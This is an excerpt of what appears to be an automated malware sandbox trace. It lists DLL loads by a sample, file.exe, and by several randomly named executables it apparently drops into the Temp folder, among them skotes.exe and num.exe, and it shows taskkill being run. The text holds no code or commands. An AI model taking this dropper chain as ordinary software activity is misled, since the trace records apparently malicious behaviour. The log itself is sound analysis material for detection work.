Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: windows.storage.dll
